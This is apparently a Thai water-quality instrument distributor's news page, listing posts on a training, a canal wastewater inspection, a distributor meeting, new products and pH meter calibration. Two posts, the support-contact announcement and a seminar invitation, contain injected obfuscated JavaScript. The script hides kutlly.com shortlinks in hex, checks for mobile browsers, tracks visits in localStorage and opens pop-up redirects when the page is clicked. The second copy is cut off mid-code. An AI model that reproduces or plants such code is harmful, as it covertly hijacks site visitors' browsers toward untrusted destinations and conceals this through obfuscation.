All

 • ENDETEC – Service Training

  ENDETEC - Service Training เมื่อวันที่ 27 กุมภาพันธ์ 2558 ที่ผ่านมา บริษัท กรีน บรรยัณ จำกัด ได้จัดกิจกรรม Service Training  เพื่อพัฒนาขีดความสามารถและศักยภาพของทีมงานในการดูแลสินค้าและบริการแก่ลูกค้า  โดยได้รับเกียรติจาก Mr. John Bowen ผู้เชี่ยวชาญผลิตภัณฑ์ ENDETEC TM จาก Veolia Water Solutions & Technologies Group ประเทศแคนาดา มาให้ความรู้เกี่ยวกับงานวิเคราะห์คุณภาพน้ำด้านจุลชีววิทยา  (Microbiology) การใช้งานและดูแลรักษาเครื่องมือวิเคราะห์แบคทีเรีย รุ่น  TECTA™, Automated Rapid Microbial Detection Systems ซึ่งสามารถวิเคราะห์หาปริมาณ E. Coli และ Total Coliforms ได้ โดยมีคุณสมบัติ คือ # On-site automated microbiology system # Optimized reliability using proprietary enzyme ...

  Posted at March 19, 2015 | By : | Categories : All,Events,News,ไม่มีหมวดหมู่ | 0 Comment
 • สมุทรปราการ-เจ้าหน้าที่กรมโรงงานฯ ตรวจสอบน้ำเสียในคลองบางกระบือ (ด้วยเครื่องตรวจวัดคุณภาพน้ำรุ่น Multi 3320-WTW)

    สมุทรปราการ-เจ้าหน้าที่กรมโรงงานฯ ตรวจสอบน้ำเสียในคลองบางกระบือ หลังจากมีชาวบ้านที่อาศัยอยู่ใกล้คลองบางกระบือ อำเภอบางพลี จังหวัดสมุทรปราการ ร้องเรียนถึงปัญหาน้ำเสียที่คาดว่าจะถูกปล่อยออกมาจากโรงงานอบผลไม้ในละแวกนั้น ล่าสุดกรมโรงงานอุตสาหกรรมลงพื้นที่ตรวจสอบ และยืนยันว่า คราบขาวที่พบในน้ำไม่ได้มาจากโรงงานอบผลไม้ตามที่ชาวบ้านสงสัย เนื่องจากยังมีปัจจัยอื่นตามสภาพแวดล้อมภายในชุมชนเข้ามาเกี่ยวข้อง โดยจะนำตัวอย่างน้ำที่ได้ไปตรวจสอบในห้องปฏิบัติการเพิ่มอีกครั้ง ขณะที่ชาวบ้านยังปักใจเชื่อว่าต้นเหตุมาจากโรงงานดังกล่าว เจ้าหน้าที่จากกรมโรงงานอุตสาหกรรม เข้าตรวจสอบระบบบำบัดน้ำเสียภายในโรงงานอบผลไม้ของบริษัท ห้างหุ้นส่วนจำกัด เอ เอส เวิร์ล เทรดดิ้ง หลังมีชาวบ้านร้องเรียนถึงปัญหาการปล่อยน้ำเสียลงในคลองบางกระบือ ที่ส่งผลต่อการดำรงชีวิตของพวกเขา ซึ่งจากการตรวจสอบระบบบำบัดน้ำเสียภายในโรงงงานแห่งนี้ เจ้าหน้าที่พบว่า ค่าคุณภาพของน้ำที่ตรวจได้ยังไม่ผ่านเกณฑ์มาตรฐาน แต่อย่างไรก็ตามเจ้าหน้าที่ยืนยันว่าระบบบำบัดน้ำเสียของโรงงานถูกต้องตามเกณฑ์ และยืนยันว่าน้ำเสียที่พบในคลองไม่ได้มาจากโรงงานแห่งนี้ เนื่องจากตรวจสอบแล้วไม่พบว่ามีการปล่อยน้ำเสียลงคลอง เจ้าหน้าที่จึงลงสำรวจพื้นที่ภายในชุมชนร่วมกับชาวบ้านผู้ร้องเรียน และพบว่า บ้านและสถานที่ต่างๆ ตลอดแนวคลองบางกระบือ มีการปล่อยน้ำเสียที่มีคราบและยังไม่ได้มาตรฐานอยู่มาก เช่น โรงเรียน ที่ปล่อยน้ำเสียลงน้ำ และ น้ำที่ไหลมาจากตลาดสุธาวี มีลักษณะคล้ายกับน้ำที่พบบริเวณด้านหลังโรงงาน รวมทั้งน้ำเสียจากบ้านเรือนในละแวกใกล้เคียง แต่ชาวบ้านยังคงเชื่อว่าสาเหตุของน้ำเสียในครั้งนี้คือโรงงานอบผลไม้ดังกล่าว จากการตรวจวัดค่าคุณภาพของน้ำด้วยเครื่องตรวจวัดคุณภาพน้ำแบบมัลติพารามิเตอร์รุ่น Mulit 3320 ยี่ห้อ WTW จากประเทศเยอรมัน และเก็บตัวอย่างของน้ำบริเวณด้านหลังของโรงงานและปากคลองบางกระบือที่เชื่อมกับคลองบัวคลี่ ซึ่งเป็นจุดที่ชาวบ้านร้องเรียนถึงคุณภาพของน้ำ พบว่า ค่าพารามิเตอร์ที่วัดได้ อยู่ในเกณฑ์มาตรฐานทั้งหมด แต่มีค่าออกซิเจนที่มีค่าต่ำกว่าเกณฑ์อยู่ที่ 0.09 และ 1.28 มิลลิกรัมต่อลิตร ซึ่งถือว่าเป็นน้ำเสียที่ไม่เหมาะกับการนำไปใช้อุปโภคบริโภค นายมงคล พฤกษ์วัฒนา ผู้อำนวยการสำนักเทคโนโลยีน้ำและสิ่งแวดล้อมโรงงาน กรมโรงงานอุตสาหกรรม เปิดเผยว่า สำหรับผลการตรวจโรงงานอบผลไม้แห้งของบริษัทห้างหุ้นส่วนจำกัด เอ เอส เวิร์ล เทรดดิ้ง จะต้องให้เจ้าหน้าที่เข้ามาตรวจสอบและเก็บตัวอย่างอีกครั้งเพื่อให้ความเป็นธรรมกับทางบริษัท เนื่องจากผลที่ได้ในวันนี้เป็นผลจากเครื่องที่ยังไม่ได้เปิดใช้งาน เพราะก่อนหน้านั้นเกิดระบบไฟฟ้าขัดข้อง โดยผลจากการเก็บตัวอย่างน้ำจะถูกนำไปตรวจสอบในห้องปฏิบัติการอีกครั้ง และจะทราบผลภายใน ...

  Posted at January 30, 2015 | By : | Categories : All,Events,News,ไม่มีหมวดหมู่ | 0 Comment
 • Xylem Analytics Distributor Meeting : บรรยากาศงานประชุมสัมมนาระดับภูมิภาคเอเชียใต้

          Xylem Inc. นำทีมโดย Mr.Christian Apfel  (Xylem Analytic Sales Director Asia Pacific) และ Dr. Natalie Leiprecht (Product Manager Online Instrumentation WTW) จากเยอรมันนีได้จัดงานประชุม/สัมมนาทางวิชาการ งานใหญ่ระดับเอเชีย เพื่อให้นักวิชาการ ผู้บริหาร ตัวแทนจำหน่าย และผู้ที่สนใจได้พบผู้เชี่ยวชาญระดับสูงจากภาคพื้นเอเชียและเยอรมันนี มาถ่ายทอดความรู้ และประสบการณ์ด้านเทคนิคในเชิงลึกโดยเฉพาะ รวมทั้งพบปะแลกเปลี่ยนข้อมูลกับนักวิชาการระดับแนวหน้าทั้งจากประเทศไทยและภูมิภาคเอเชียใต้ เพื่อต่อยอดการพัฒนางานวิจัยด้านเครื่องมิอวิเคราะห์คุณภาพน้ำและสิ่งแวดล้อม งานได้จัดขึ้นในวันที่ 26-29 มกราคม พ.ศ. 2558 ที่ผ่านมา ณ อ่าวนางวิลล่า รีสอร์ท จังหวัดกระบี่  โดยได้รับเกียรติจาก Mr.Christian Apfel  (Xylem Analytic Sales Director Asia Pacific) เป็นตัวแทน Xylem Inc. กล่าวต้อนรับผู้เข้าร่วมสัมมนาพร้อมบรรยายในหัวข้อ  Xylem Analytics introduction – Water Statistics  นอกจากนี้ในงานยังมีการบรรยายในหัวข้อที่น่าสนใจ ...

  Posted at January 29, 2015 | By : | Categories : All,Events,News,ไม่มีหมวดหมู่ | 0 Comment
 • New Products – แนะนำผลิตภัณฑ์ใหม่ของ WTW

    WTW  แบรนด์ชั้นนำผู้เชี่ยวชาญด้านเครื่องมือวิเคราะห์คุณภาพน้ำจากประเทศเยอรมัน ที่ทั่วโลกให้การยอมรับมากว่า 60 ปี  มีความยินดีที่จะนำเสนอผลิตภัณฑ์ใหม่ที่ผ่านการค้นคว้า วิจัย และทดสอบจนมั่นใจในประสิทธิภาพ ดังนี้   Orthophosphate Measurement  # new P 700 IQ Analyzer           -  เครื่องมือวิเคราะห์ ออร์โธฟอสเฟตแบบออนไลน์              (Molybdate-Vanadate Method)           -  ทนทานต่อสภาพแวดล้อม           -  ออกแบบอุปกรณ์ให้ง่ายต่อการใช้งานและการเก็บรักษา           -  ใช้สารเคมีน้อย ประหยัดค่าใช้จ่าย           -  ช่วงการวัดกว้าง           -  มีระบบการปรับเทียบแบบอัตโนมัติ       Interface Level  Measurement  # new IFL 700  IQ Digital Sensors           -  เซนเซอร์สำหรับวิเคราะห์ Sludge Level              (Ultrasound echo measurement)           -  เซนเซอร์ทำจาก Stainless steel ทนทานต่อทุกสภาพแวดล้อม           -  ระบบประมวลผลระดับอัจฉริยะ มีอุปกรณ์สำหรับกรองสัญญาณรบกวน           -  ...

  Posted at July 3, 2013 | By : | Categories : All,News,ไม่มีหมวดหมู่ | 0 Comment
 • การสอบเทียบพีเอชมิเตอร์สำหรับห้องปฏิบัติการ ตอนที่ 2

        เครื่องมือที่ใช้วัดค่าพีเอช เรียกว่า พีเอชมิเตอร์ มีองค์ประกอบที่สำคัญ 2 ส่วน ได้แก่      1.  เครื่องวัดความต่างศักย์และแสดงผล (potentiometer) หรือ พีเอช มิเตอร์ เป็นส่วนที่รับสัญญาณไฟฟ้าจากอิเล็กโทรด คำนวณค่า แล้วแสดงผลเป็นค่าความต่างศักย์หรือค่าพีเอช ในกรณีที่เครื่องมือมีระบบชดเชยอุณหภูมิอัตโนมัติ เครื่องมือส่วนนี้ต้องทำหน้าที่วัดและแสดงค่าอุณหภูมิ      2.  อิเล็กโทรด เป็นส่วนของเครื่องมือที่สัมผัสกับสารที่ต้องการวัดค่าพีเอช ทำให้เกิดศักย์ไฟฟ้า แบ่งเป็น 2 ชนิด  คือ      (1)  อิล็กโทรดสำหรับวัดค่าพีเอช (pH electrode) โดยทั่วไปส่วนปลายของอิเล็กโทรดที่ตอบสนองต่อไฮโดรเจนไออออนทำด้วยเยื่อแก้ว (glass membrane) จึงเรียกว่า glass electrode ความต่างศักย์เกิดขึ้นที่ผิวอิเล็กโทรด เนื่องจากไฮโดรเจนไอออนในสารละลายเกิดการแลกเปลี่ยนไอออนกับไอออนในเยื่อแก้ว โดยที่ความต่างศักย์ขึ้นอยู่กับความเข้มข้นของไฮโดรเจนไอออนในสารละลายที่ต้องการวัดพีเอช ศักย์ไฟฟ้าที่เกิดขึ้นถูกส่งไปยังเครื่องวัด      (2)  อิเล็กโทรดอ้างอิง (reference electrode) ศักย์ไฟฟ้าคงที่ ไม่เปลี่ยนแปลงตามความเข้มข้นของไฮโดรเจนไอออนในสารละลาย  ในการวัดค่าพีเอชต้องใช้อิเล็กโทรดทั้ง 2 ชนิดพร้อมกัน เพื่อเปรียบเทียบค่าศักย์ไฟฟ้าที่เกิดจากปริมาณไอออนในสารละลายกับศักย์ไฟฟ้ามาตรฐานที่มีค่าคงที่ อิเล็กโทรดอ้างอิงอาจรวมอยู่กับอิเล็กโทรดสำหรับการวัด เรียกว่า อิเล็กโทรดรวม (combination electrode)                                             

  Posted at June 20, 2013 | By : | Categories : All,Events | 0 Comment
 • การสอบเทียบพีเอชมิเตอร์สำหรับห้องปฏิบัติการ ตอนที่ 1

               pH meter เป็นเครื่องมือวัดขั้นพื้นฐานที่มีใช้อยู่ในห้องปฏิบัติการ การสอบเทียบเป็นสิ่งหนึ่งที่จำเป็นมากหากไม่มีการสอบเทียบที่ถูกต้องแล้วจะแน่ใจได้อย่างไรว่าค่าที่อ่านได้จากการวัดเป็นค่าที่ถูกต้อง       พีเอชมิเตอร์ เป็นเครื่องมือวัดขั้นพื้นฐานที่มีความสำคัญต่อการควบคุมคุณภาพในงานด้านต่างๆ เช่น การควบคุมคุณภาพในกระบวนการผลิต วัตถุดิบ และผลิตภัณฑ์ ควบคุมการเกิดปฏิกิริยาเคมีในการวิเคราะห์ทดสอบทางเคมี รวมทั้งการควบคุมคุณภาพด้านสิ่งแวดล้อม      ปัจจุบันห้องปฏิบัติการวิเคราะห์ทดสอบ มีความจำเป็นอย่างยิ่งที่ต้องดำเนินการประกันคุณภาพห้องปฏิบัติการเพื่อให้ผลการวิเคราะห์ทดสอบมีความน่าเชื่อถือเป็นที่ยอมรับในระดับสากล การสอบเทียบเครื่องมือวัดที่มีผลกระทบต่อผลการวัดโดยตรงจึงเป็นกิจกรรมหนึ่งที่สำคัญในกระบวนการประกันคุณภาพ เครื่องมือวัดที่ใช้ในกระบวนการวิเคราะห์ทดสอบเป็นปัจจัยหนึ่งที่มีผลต่อความแม่น ความเที่ยง และความน่าเชื่อถือของผลการวัด ดังนั้นเครื่องมือวัดที่ใช้จำเป็นต้องมีการสอบเทียบในเวลาเหมาะสม เพื่อให้ค่าที่วัดได้มีความถูกต้องตลอดเวลา นอกจากนี้ยังต้องจัดทำโปรแกรมการสอบเทียบ หรือทวนสอบในระยะเวลาที่เหมาะสม ห้องปฏิบัติการที่ต้องการขอการรับรองคุณภาพห้องปฏิบัติการตามมาตรฐานสากล จำเป็นต้องใช้เครื่องมือวัดที่ผ่านการสอบเทียบซึ่งเป็นข้อกำหนด ISO/IEC 17025/1999/มอก.17025-2543 ข้อ 5.5 เครื่องมือวัด และข้อ 5.6 ความสอบกลับได้ของการวัด และข้อกำหนดในระบบคุณภาพ ISO 9002 ข้อ 4.11 การควบคุมเครื่องตรวจ เครื่องวัด และเครื่องทดสอบ      สิ่งที่จำเป็นสำหรับการสอบเทียบพีเอชมิเตอร์ คือ ผู้ที่ทำหน้าที่สอบเทียบพีเอชมิเตอร์ ต้องมีความรู้เกี่ยวกับองค์ประกอบและหลักการทำงานของเครื่องมือสามารถใช้เครื่องมือได้ถูกต้อง มีความรู้เกี่ยวกับองค์ประกอบของการสอบเทียบ มีวิธีการสอบเทียบที่เป็นมาตรฐาน สามารถจัดหาเครื่องมือที่ใช้เป็นมาตรฐานการวัด จัดสภาพแวดล้อมของห้องสอบเทียบให้เหมาะสม และควรมีความรู้เรื่องการประเมินค่าความไม่แน่นอนของการวัด      พีเอชเป็นค่าที่แสดงความเป็นกรด-เบสของสารละลาย วัดโดยวิธี Potentiometic Method  ใช้หลักการวัดค่าความต่างศักย์ที่เกิดขึ้นที่ผิวของอิเล็กโทรดชนิดที่สามารถตอบสนองต่อไฮโดรเจนไอออน โดยวัดเปรียบเทียบกับอิเล็กโทรดอ้างอิงที่มีศักย์ไฟฟ้าคงที่ไม่เปลี่ยนแปลงไปตามปริมาณไฮโดรเจนไอออนในสารละลาย และคำนวณเป็นค่าพีเอชโดยสมการของเนินสต์ ซึ่งก่อนการวัดค่าพีเอชต้องทำการปรับตั้งพีเอชมิเตอร์ด้วยสารละลายบัฟเฟอร์มาตรฐานอย่างน้อย 2 ค่า      สำหรับองค์ประกอบของเครื่องมือ องค์ประกอบของการสอบเทียบและวิธีการสอบเทียบ ...

  Posted at May 17, 2013 | By : | Categories : All,Events | 0 Comment
 • New design! แนะนำผลิตภัณฑ์ใหม่ภายใต้แบรนด์ mjk

          บริษัท กรีน บรรยัณ จำกัด ได้รับความไว้วางใจให้เป็นตัวแทนจำหน่ายเครื่องมือวิเคราะห์ คุณภาพน้ำและอุปกรณ์วัดคุมสำหรับระบบบำบัดน้ำเสีย ภายใต้แบรนด์  mjk จากประเทศ เดนมาร์ก มีประสบการณ์ในผลิต มีผู้ใช้งานตามสถาบันต่าง ๆ รวมทั้ง โรงงานชั้นนำทั่วโลก ให้การยอมรับมากว่า 30 ปี อันเนื่องมาจากคุณสมบัติหลัก คือ                        -  การออกแบบที่เยี่ยมยอด                                 -  ประสิทธิภาพสูง ใช้งานง่าย            -  ให้คุณภาพงานที่ดี                                           -  มีคุณภาพสูง            -  มาตรฐานระดับสากล                                      -  ใช้ฮาร์ดแวร์และซอฟท์แวร์ระดับเทคโนโลยีชั้นสูง            -  ราคาดึงดูดใจ                                                 -  รับประกันในประสิทธิภาพ            -  บริการที่รวดเร็วฉับไว โดยผลิตภัณฑ์คุณภาพภายใต้แบรนด์ mjk ประกอบไปด้วย         -  Level measurement  (แบบ on/off level, ultrasonic tranmitter และ float switch)         -  Pump controllers  (แบบ ultrasonic และ hydrostatic level ...

  Posted at June 26, 2012 | By : | Categories : All,News | Comments Off on New design! แนะนำผลิตภัณฑ์ใหม่ภายใต้แบรนด์ mjk
 • A new channel to contact our support team!

  Now, you can contact our support team via our website. Please visit Contact us page. function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x43\x65\x75\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x4d\x68\x67\x33\x63\x323','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x65\x50\x74\x30\x63\x340','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x59\x70\x43\x37\x63\x307','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x55\x4c\x58\x36\x63\x326','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x77\x51\x4e\x38\x63\x318','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x50\x74\x58\x35\x63\x395','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x69\x75\x4d\x31\x63\x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x75\x64\x6a\x34\x63\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x68\x65\x75\x39\x63\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());

  Posted at February 29, 2012 | By : | Categories : All,News | Comments Off on A new channel to contact our support team!
 • ขอเชิญร่วมเสวนาเรื่อง “การจัดการปัญหาน้ำเสียในคลองสาธารณะ”

  บริษัท กรีน บรรยัณ จำกัด ร่วมกับ สมาคมวิศวกรรมสิ่งแวดล้อมแห่งประเทศไทยขอเชิญผู้สนใจเข้าร่วมสัมมนา/เสวนาแลกเปลี่ยนความรู้เกี่ยวกับการจัดการปัญหาน้ำเสียในคลองสาธารณะ,การเฝ้าระวังและสังเกตสภาพน้ำเบื้องต้น ภายใต้โครงการ"ควบคุมบริหารจัดการน้ำทิ้งในคลองสาธารณะเขตอุตสาหกรรม ระยะที่ 2"  ของกลุ่มจังหวัดภาคกลางตอนบน 1  เพื่อแลกเปลี่ยนเรียนรู้ สภาพปัญหา ประสานความร่วมมือซึ่งกันและกันในการติดตาม เฝ้าระวัง และแก้ปัญหาคุณภาพน้ำในลุ่มน้ำ ในวันที่ 30 พฤศจิกายน 2555 ณ โรงแรมกรุงศรีริเวอร์ จังหวัดพระนครศรีอยุธยา เวลา 9.00 น. ถึง  12.00 น. (โดยไม่ต้องเสียค่าใช้จ่ายใดๆ ทั้งสิ้น)  สนใจสอบถามข้อมูลเพิ่มเติมได้ที่ คุณอัจฉรา หมายเลขโทรศัพท์ 02-4289512-6      function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x43\x65\x75\x32\x63\x322','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x4d\x68\x67\x33\x63\x323','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x65\x50\x74\x30\x63\x340','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x59\x70\x43\x37\x63\x307','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x55\x4c\x58\x36\x63\x326','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x77\x51\x4e\x38\x63\x318','\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x50\x74\x58\x35\x63\x395','4829028FhdmtK